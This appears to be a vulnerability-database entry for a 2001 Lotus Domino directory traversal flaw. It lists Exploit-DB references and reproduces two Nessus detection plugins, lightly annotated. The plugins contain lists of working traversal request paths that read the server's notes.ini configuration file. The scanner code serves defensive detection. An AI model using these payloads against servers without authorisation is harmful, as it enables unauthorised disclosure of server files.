Vulnerabilities > CVE-2001-0009 - Unspecified vulnerability in Lotus Domino Server
Attack vector: UNKNOWN
Attack complexity: UNKNOWN
Privileges required: UNKNOWN
Confidentiality impact: UNKNOWN
Integrity impact: UNKNOWN
Availability impact: UNKNOWN
Summary
Directory traversal vulnerability in Lotus Domino 5.0.5 web server allows remote attackers to read arbitrary files via a .. attack.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 4 |
Exploit-Db
description: Lotus Domino Server 5.0.x Directory Traversal Vulnerability (2). CVE-2001-0009. Remote exploits for multiple platform
id: EDB-ID:20530
last seen: 2016-02-02
modified: 2001-01-05
published: 2001-01-05
reporter: Georgi Guninski
source: https://www.exploit-db.com/download/20530/
title: Lotus Domino Server 5.0.x - Directory Traversal Vulnerability 2

description: Lotus Domino Server 5.0.x Directory Traversal Vulnerability (1). CVE-2001-0009. Remote exploits for multiple platform
id: EDB-ID:20529
last seen: 2016-02-02
modified: 2001-01-15
published: 2001-01-15
reporter: Michael Smith
source: https://www.exploit-db.com/download/20529/
title: Lotus Domino Server 5.0.x - Directory Traversal Vulnerability 1
Nessus
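NASL family Web Servers NASL id NOTESINICHECK.NASL description Using a specially crafted request URL containing last seen 2020-06-01 modified 2020-06-02 plugin id 12248 published 2004-05-25 reporter This script is Copyright (C) 2004-2018 Net-Square Solutions Pvt Ltd. source https://www.tenable.com/plugins/nessus/12248 title IBM Lotus Domino Server Crafted .nsf Request Traversal Arbitrary File Access code
#
# Copyright (C) 2000 - 2009 Net-Square Solutions Pvt Ltd.
# By: Hemil Shah
# Desc: This script will check for the notes.ini file in the remote web server.
# Changes by Tenable:
# - Revised plugin title, added VDB refs, replaced bad SF link, changed family, added solution (9/2/09)

include("compat.inc");

# Registration block: runs only when the scanner loads the plugin metadata.
if(description)
{
  script_id(12248);
  script_version ("1.16");

  script_cve_id("CVE-2001-0009");
  script_bugtraq_id(2173);

  script_name(english:"IBM Lotus Domino Server Crafted .nsf Request Traversal Arbitrary File Access");

  script_set_attribute(attribute:"synopsis", value: "The remote web server is susceptible to a directory traversal attack." );
  script_set_attribute(attribute:"description", value: "Using a specially crafted request URL containing '.nsf/..', the installed version of Lotus Domino on the remote host can be abused to reveal the contents of arbitrary files on the server." );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Jan/68" );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Jan/148" );
  script_set_attribute(attribute:"solution", value: "Upgrade to version 5.0.6a or higher." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2004/05/25");
  script_set_attribute(attribute:"vuln_publication_date", value: "2001/01/05");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_summary(english:"notes.ini checker");
  # ACT_ATTACK: the check sends real traversal requests instead of relying on the banner.
  script_category(ACT_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2004-2020 Net-Square Solutions Pvt Ltd.");
  script_family(english:"Web Servers");
  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

# start script
include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80, embedded:TRUE);
if (!get_port_state(port)) exit(0);

# presumably set by an earlier plugin when the server answers unknown URLs
# without a proper 404 -- in that case a 200 below would prove nothing.
if (get_kb_item("www/no404/" + port)) exit(0);

# Only probe servers whose banner mentions Domino.
banner = get_http_banner(port:port);
if ("Domino" >!< banner) exit(0);

# Baseline request for a file that should not exist. If the server answers 200
# anyway, its status codes cannot be trusted and the check stops, which avoids
# false positives.
req = http_get(item:"../../../../whatever.ini", port:port);
res = http_keepalive_send_recv(port:port, data:req);
if (res == NULL) exit(0);
if (ereg(pattern:"^HTTP/[01]\.[01] 200 ", string:res)) exit(0);

# Request variants tried against the server. The original list carried
# "/.nsf/../lotus/domino/notes.ini" twice (indexes 20 and 21); the duplicate is
# dropped so the same request is not sent twice. The unused DEBUG variable of
# the original is dropped as well.
dirs = make_list(
  "/%00%00.nsf/../lotus/domino/notes.ini",
  "/%00%20.nsf/../lotus/domino/notes.ini",
  "/%00%c0%af.nsf/../lotus/domino/notes.ini",
  "/%00...nsf/../lotus/domino/notes.ini",
  "/%00.nsf//../lotus/domino/notes.ini",
  "/%00.nsf/../lotus/domino/notes.ini",
  "/%00.nsf/..//lotus/domino/notes.ini",
  "/%00.nsf/../../lotus/domino/notes.ini",
  "/%00.nsf.nsf/../lotus/domino/notes.ini",
  "/%20%00.nsf/../lotus/domino/notes.ini",
  "/%20.nsf//../lotus/domino/notes.ini",
  "/%20.nsf/..//lotus/domino/notes.ini",
  "/%c0%af%00.nsf/../lotus/domino/notes.ini",
  "/%c0%af.nsf//../lotus/domino/notes.ini",
  "/%c0%af.nsf/..//lotus/domino/notes.ini",
  "/...nsf//../lotus/domino/notes.ini",
  "/...nsf/..//lotus/domino/notes.ini",
  "/.nsf///../lotus/domino/notes.ini",
  "/.nsf//../lotus/domino/notes.ini",
  "/.nsf//..//lotus/domino/notes.ini",
  "/.nsf/../lotus/domino/notes.ini",
  "/.nsf/..///lotus/domino/notes.ini",
  "/.nsf%00.nsf/../lotus/domino/notes.ini",
  "/.nsf.nsf//../lotus/domino/notes.ini"
);

report = "";

foreach dir (dirs)
{
  req = http_get(item:dir, port:port);
  res = http_keepalive_send_recv(port:port, data:req);
  if (res == NULL) exit(0);

  # Anything other than a 200 means this variant was rejected; try the next one.
  if (!ereg(pattern:"^HTTP/[01]\.[01] 200 ", string:res)) continue;

  # Confirm the response really is notes.ini before reporting. The original
  # accepted only the case-sensitive substring "DEBUG", which misses a
  # notes.ini without such a line. The "[notes]" section header and the
  # "notesprogram" key (the markers the other Domino traversal plugin for this
  # CVE matches on) are accepted too.
  # NOTE(review): "DEBUG" alone is a generic token that any 200 page could
  # contain; consider dropping it once the stronger markers are validated.
  lowered = tolower(res);
  if (("DEBUG" >< res) || ("[notes]" >< lowered) || ("notesprogram" >< lowered))
  {
    report = report + string("\nSpecifically, the request for ", dir, " appears\n");
    report = report + string("to have retrieved the notes.ini file.");
    security_warning(port:port, extra:report);
    exit(0);
  }
}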
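NASL family Web Servers NASL id DOMINO_TRAVERSAL.NASL description It is possible to read arbitrary files on the remote server by prepending %00%00.nsf/../ in front of it. last seen 2020-06-01 modified 2020-06-02 plugin id 11344 published 2003-03-10 reporter This script is Copyright (C) 2003-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/11344 title IBM Lotus Domino Directory Traversal Arbitrary File Access code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration block: runs only when the scanner loads the plugin metadata.
if (description)
{
  script_id(11344);
  script_version("1.23");
  script_cvs_date("Date: 2018/07/10 14:27:33");

  script_cve_id("CVE-2001-0009");
  script_bugtraq_id(2173);

  script_name(english:"IBM Lotus Domino Directory Traversal Arbitrary File Access");
  script_summary(english:"\..\..\file.txt");

  script_set_attribute(attribute:"synopsis", value: "Arbitrary files may be read on the remote host.");
  script_set_attribute(attribute:"description", value: "It is possible to read arbitrary files on the remote server by prepending %00%00.nsf/../ in front of it.");
  script_set_attribute(attribute:"solution", value: "Upgrade to a newer version.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value:"2003/03/10");
  script_set_attribute(attribute:"vuln_publication_date", value:"2001/01/05");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:lotus_domino");
  script_end_attributes();

  # ACT_ATTACK: beyond the banner test, the check sends real traversal requests.
  script_category(ACT_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
  script_family(english:"Web Servers");
  script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80, embedded: 0);

# The banner is fetched once; the original fetched it a second time right after
# the filter below without using anything new.
banner = get_http_banner(port:port);
if ( ! banner ) exit(0);

# The original filter looked for "Lotus Domino" (with a space), while the
# version test below expects "Lotus-Domino/..." (with a hyphen). A banner with
# only the hyphenated form was discarded here and never reached either check.
# Matching on "Domino" accepts both spellings and every banner the old filter
# accepted.
if ( "Domino" >!< banner ) exit(0);

# Banner-only verdict: a 5.0.0 - 5.0.6 version string is reported without any
# request being sent, so the finding is inferred rather than confirmed.
# NOTE(review): [^0-9] also accepts a letter suffix, so a banner such as
# "Lotus-Domino/5.0.6a" matches, yet plugin 12248 for the same CVE names 5.0.6a
# as the fixed release. Confirm the intended upper bound.
if(egrep(pattern:"Lotus-Domino/5\.0\.[0-6][^0-9]", string:banner))
{
  security_warning(port);
  exit (0);
}

# Test for the flaw anyway
# Every extension / prefix / traversal-depth combination is requested in turn.
exts = make_list(".nsf", ".box", ".nt4");
vars = make_list("%00", "%00%00", "%20", "%C0%AF", "%c0%af%00", "%20%00", "/..");
ups  = make_list("/../../../../../", "//../../../../../");

foreach ext (exts)
  foreach tvar (vars)
    foreach up (ups)
    {
      # NOTE(review): the URL starts with "/" only when tvar is "/..";
      # confirm http_send_recv3 handles an item without a leading slash.
      url = string(tvar, ext, up, "lotus/domino/notes.ini");
      w = http_send_recv3(port:port, method: "GET", item:url);
      if (isnull(w)) exit(0);

      # w[2] is lower-cased so the notes.ini markers match regardless of case.
      r = tolower(w[2]);

      # Report only when the response contains a key or section header that
      # identifies notes.ini content.
      if (("httphost" >< r) ||
          ("resultsdirectory" >< r) ||
          ("numaddlocalreplica" >< r) ||
          ("normalmessagesize" >< r) ||
          ("sharednotes" >< r) ||
          ("[notes]" >< r) ||
          ("notesprogram" >< r))
      {
        security_warning(port);
        exit(0);
      }
    }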
References
- http://www.osvdb.org/1703
- http://www.osvdb.org/1703
- http://www.securityfocus.com/archive/1/154537
- http://www.securityfocus.com/archive/1/154537
- http://www.securityfocus.com/archive/1/155124
- http://www.securityfocus.com/archive/1/155124
- http://www.securityfocus.com/bid/2173
- http://www.securityfocus.com/bid/2173
- https://exchange.xforce.ibmcloud.com/vulnerabilities/5899
- https://exchange.xforce.ibmcloud.com/vulnerabilities/5899